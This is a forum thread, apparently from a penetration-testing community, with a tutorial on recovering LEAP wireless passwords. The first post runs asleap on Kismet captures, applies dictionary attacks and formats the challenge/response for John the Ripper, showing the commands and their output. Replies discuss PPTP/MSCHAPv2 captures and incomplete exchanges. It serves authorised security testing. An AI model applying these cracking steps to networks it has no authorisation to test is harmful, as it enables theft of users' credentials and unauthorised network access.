Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Tutorial : Cracking LEAP networks with ASLEAP and John

  1. #1
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default Tutorial : Cracking LEAP networks with ASLEAP and John

    I recently performed a pen-test at a client site running LEAP. I thought I would document the process, not only to show others how, but for future reference.

    To start, we are assuming you've run kismet on the site and determined they are using LEAP. Kismet will create a .dump file in the local directory from which you are running the tool. Within this dump file are the LEAP challenge and responses. Depending on the amount of traffic, you will get either of these responses from ASLEAP:
    Code:
     asleap -r Kismet-Apr-29-2008-1.dump
    asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Using the passive attack method.
    Closing pcap ...
    This one didnt have any challenge/responses. Now this one:
    Code:
     asleap -r Kismet-Apr-29-2008-1.dump
    asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Using the passive attack method.
    
    Captured LEAP exchange information:
         username:     <removed>
         challenge:     d9b6a14378985feb
         response:      5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603
         hash bytes:   6fd3
    Now we have a usable dump file, we can run a dictionary against the LEAP exchange. Prior to version 1.4 of asleap, you would have to use genkeys to generate a lookup file. Version 1.4 allows you to provide a ASCII dictionary directly with the -W option.
    Here's what we do:
    Code:
     asleap -r Kismet-Apr-29-2008-1.dump -W some_dictionary.txt
    Depending on the size of your dictionary, and the password policy of the client, you may get the NT hash for the user. With this you can easily crack it with plain-text.info rainbow tables.

    Worst case scenario, you get this response from asleap:
    Code:
     Could not find a matching NT hash. Try expanding your password list. I've given up. Sorry it didn't work out.
    Closing pcap ...
    This is where John the Ripper comes in. John can take the challenge/response from asleap and attempt to run a hybrid attack against it, brute forcing based upon your dictionary! Here's how:

    First, you must provide John a properly formatted challenge/response string. I used nano to do this. Open a blank document and copy the username, response, and challenge to the empty document using this format:
    username:::response::challenge

    Mine looked like this:
    Code:
     <removed>::::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603:d9b6a14378985feb
    Save the file and run john, requesting the NETLM format, and give it your text file:
    Code:
     john --format=NETNTLM textfile.txt --wordlist=yourdictionary.txt --rules
    Loaded 1 password hash (LM C/R DES [netlm]
    John will make three passes against your input. It will run your dictionary, then your dictionary with appended characters, and finally a brute force. Press the space bar as john is running to see progress. The (1) (2) (3) will tell you which stage John is in. Stage three will take a long time! Your best bet is to have a comprehensive dictionary that can crack the password in stage 1 or 2. Also, knowing the clients password policy would be very helpful in determining the level of success you may have.

    Edit 7-15-08:
    To attempt LM hashes, change your input file to have three colons followed by two colons.
    Code:
     <removed>:::5540fd69295648c3db33e2217dbd3d0157f3a8f2c2ee1603::d9b6a14378985feb
    Your john command would be:
    Code:
     john --format=NETLM textfile.txt --wordlist=yourdictionary.txt --rules
    John stores the cracked hashes in the john.pot file for future reference. So, if you try to crack an account that was already successful, you wont get any results. That is due to the results being stored in the john.pot file.

    Hope this helps some of you out!

    William

  2. #2
    Just burned his ISO the_Fox200634's Avatar
    Join Date
    May 2008
    Posts
    8

    Default

    please can it be video Tutorial ?? & thanxxx

  3. #3
    Moderator theprez98's Avatar
    Join Date
    Jan 2010
    Location
    Maryland
    Posts
    2,533

    Default

    Quote Originally Posted by the_Fox200634 View Post
    please can it be video Tutorial ?? & thanxxx
    Are you not capable of reading?
    "\x74\x68\x65\x70\x72\x65\x7a\x39\x38";

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default

    Quote Originally Posted by theprez98 View Post
    Are you not capable of reading?
    Typing is sometimes a problem too.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #5
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Updated with new information.

  6. #6
    Just burned his ISO
    Join Date
    Jun 2006
    Posts
    7

    Default

    ANy chances of having more information about using a rainbow tables (which one) with this attack ?

    Thanks a lot in advance

  7. #7
    Just burned his ISO
    Join Date
    Nov 2008
    Posts
    1

    Default

    So I've got sth like that:
    Code:
    Captured PPTP exchange information:
            username:          username
            auth challenge:    d637b0ed524788f0cecf87e16ada26fe
            peer challenge:    18a84cbcab35d1778ee7fdca7ca4bdfd
            peer response:     90739dc4365b4d45cf8b7a1a8223e28a96ae23165da5cc7b
            challenge:         5ef0615b8b680e7e
            hash bytes:        b6dc
            Could not find a matching NT hash.  Try expanding your password list.
            I've given up.  Sorry it didn't work out.
    As you can see it's mschapv2. How can i crack it using john?
    Is it possible to do that using the method below?
    Thanks!

  8. #8
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    You've captured a PPTP response, not a LEAP. Both are implemenations of MSChapV2, but PPTP adds an additional layer. Therefore, you cannot use John to crack at this time and lose out on the brute force, hybrid attack. You can use the asleap method I outlined above, but it appears you already tried and were unsuccessful. Try to capture more challenge/responses and try again.

    William

  9. #9
    Just burned his ISO
    Join Date
    Jul 2006
    Posts
    7

    Default

    good tut, what would cause the following output (not a full capture?):

    asleap 2.2 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
    Captured LEAP exchange information:
    username: < .. >
    challenge: a4c275524df69c2b
    response: 11a6119c4e11aba55d8518e1c8c2980895ea489a7ba39d0b
    Could not recover last 2 bytes of hash from the
    challenge/response. Sorry it didn't work out.


    Cheers

  10. #10
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    This is probably due to Kismet running in default channel hop mode. You only grabbed part of the exchange before Kismet jumped channels. Try scanning only the one channel, and preferably only the SSID. You should get the entire challenge/response and be able to continue.

    William

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •